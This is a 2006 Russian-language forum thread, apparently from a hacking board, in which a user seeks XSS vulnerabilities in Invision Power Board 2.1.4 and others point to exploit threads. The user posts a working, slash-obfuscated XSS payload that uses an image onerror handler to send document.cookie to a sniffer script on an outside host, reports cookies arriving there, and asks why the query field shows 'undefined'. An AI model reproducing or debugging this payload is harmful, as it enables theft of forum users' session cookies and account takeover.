Просмотр полной версии : Уязвимость для Ibp 2.1.4.
Люди плиз подскажите есть ли какие нибудь уязвимости ( Желательно Xss) для форумов Ibp 2.1.4.?
Заранее спасибо.
мляяяяя
http://www.google.com/custom?hl=en&inlang=ru&lr=&ie=windows-1251&oe=windows-1251&client=pub-9080155680222782&channel=7143967212&cof=FORID%3A1%3BGL%3A1%3BBGC%3AFFFFFF%3BT%3A%23000 000%3BLC%3A%230000ff%3BVLC%3A%23663399%3BALC%3A%23 0000ff%3BGALT%3A%23008000%3BGFNT%3A%230000ff%3BGIM P%3A%230000ff%3BDIV%3A%23336699%3BLBGC%3A336699%3B AH%3Acenter%3B&domains=www.SECURITY.NNOV.ru&q=Invision+Power+Board+2.1.4&btnG=Search&sitesearch=www.SECURITY.NNOV.ru
КОГДА ЭТО ЗАКОНЧИТСЯ??? :mad:
http://forum.antichat.ru/thread15709.html
ТУТ (http://damagelab.org/index.php?showtopic=5382&view=findpost&p=38763) смотри....
podkashey
20.03.2006, 18:36
А также тут: http://forum.antichat.ru/thread11807.html
Спасибо, надо бы это добавить в топик про полный анализ Ibp, а то я там и искал.
Но возникла проблема.
После вставки этого кода
/ onerror=document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg/.source.replace(/x/g,String.fromCharCode(47))+String.fromCharCode(63) +document.cookies tyle=visibility:hidden= .gif
Приходят куки на сниффер, но в поле QUERY пишет undefined
QUERY=undefined
И еще можно тупой вопрос?
У нас есть
http:xxantichat.ruxcgi-binxs.jpg/
Тут заменен слэш на X, я смотрел различные кодировки для него, но нигде не видел код в виде буквы X. Где можно поподробней про это прочитать?
podkashey
20.03.2006, 20:55
Вот здесь можно прочитать подробнее:
.source.replace(/x/g,String.fromCharCode(47))
а для форума Ibp 2.1.5. кто нить знает уязвимость?
Так никто не знает почему куки неизвестны? Это случайно не хорошо настроенный Internet Explorer?
Black_Death
22.03.2006, 15:17
.source.replace(/x/g,String.fromCharCode(47))
Вот тока нах ето надо?? Объясни..
тема тупа,есть такие ресурсы как милворм,секлаб секьюрити.ннов
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot